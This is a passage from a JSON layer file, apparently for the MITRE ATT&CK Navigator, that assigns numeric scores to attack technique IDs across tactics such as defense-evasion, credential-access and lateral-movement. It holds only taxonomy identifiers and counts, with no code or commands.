\"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1213.003\",\n      \"tactic\": \"collection\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1195.001\",\n      \"tactic\": \"initial-access\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1567.001\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1609\",\n      \"tactic\": \"execution\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1611\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036.005\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 18,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1069.003\",\n      \"tactic\": \"discovery\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021.004\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1586\",\n      \"tactic\": \"resource-development\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1591.004\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1003.004\",\n      \"tactic\": \"credential-access\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1003.003\",\n      \"tactic\": \"credential-access\",\n      \"score\": 23,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1048\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021.002\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 37,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1557.001\",\n      \"tactic\": \"credential-access\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1557.001\",\n      \"tactic\": \"collection\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1187\",\n      \"tactic\": \"credential-access\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021.001\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 15,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1095\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.004\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.004\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1558.003\",\n      \"tactic\": \"credential-access\",\n      \"score\": 17,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1595.002\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1071.004\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 17,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1102.002\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1495\",\n      \"tactic\": \"impact\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1505\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1565.002\",\n      \"tactic\": \"impact\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1552.004\",\n      \"tactic\": \"credential-access\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1561.001\",\n      \"tactic\": \"impact\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1561.002\",\n      \"tactic\": \"impact\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1124\",\n      \"tactic\": \"discovery\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1557\",\n      \"tactic\": \"credential-access\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1557\",\n      \"tactic\": \"collection\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1037.005\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1037.005\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.014\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.014\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.003\",\n      \"tactic\": \"initial-access\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1569.001\",\n      \"tactic\": \"execution\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.004\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543.004\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 152,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1564.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 23,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1189\",\n      \"tactic\": \"initial-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1564.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1555.001\",\n      \"tactic\": \"credential-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1497.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1497.001\",\n      \"tactic\": \"discovery\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1566.001\",\n      \"tactic\": \"initial-access\",\n      \"score\": 23,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.002\",\n      \"tactic\": \"execution\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1056.002\",\n      \"tactic\": \"collection\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1056.002\",\n      \"tactic\": \"credential-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1078.001\",\n      \"tactic\": \"initial-access\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036.006\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1137.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1204.002\",\n      \"tactic\": \"execution\",\n      \"score\": 36,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1553\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.007\",\n      \"tactic\": \"execution\",\n      \"score\": 22,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1071\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1553.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1586.003\",\n      \"tactic\": \"resource-development\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1590\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1197\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1197\",\n      \"tactic\": \"persistence\",\n      \"score\": 16,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1102.001\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1102.003\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1568\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1595\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1567.002\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 13,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1056\",\n      \"tactic\": \"collection\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1056\",\n      \"tactic\": \"credential-access\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1221\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1499.004\",\n      \"tactic\": \"impact\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1210\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 15,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1127\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 20,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.011\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 43,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 33,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 33,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.012\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.012\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.005\",\n      \"tactic\": \"execution\",\n      \"score\": 26,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.005\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1555.005\",\n      \"tactic\": \"credential-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1195.002\",\n      \"tactic\": \"initial-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1482\",\n      \"tactic\": \"discovery\",\n      \"score\": 17,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1090.003\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1559.001\",\n      \"tactic\": \"execution\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.010\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 19,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1003.005\",\n      \"tactic\": \"credential-access\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 12,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550.003\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1127.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.009\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021.006\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1090.002\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.002\",\n      \"tactic\": 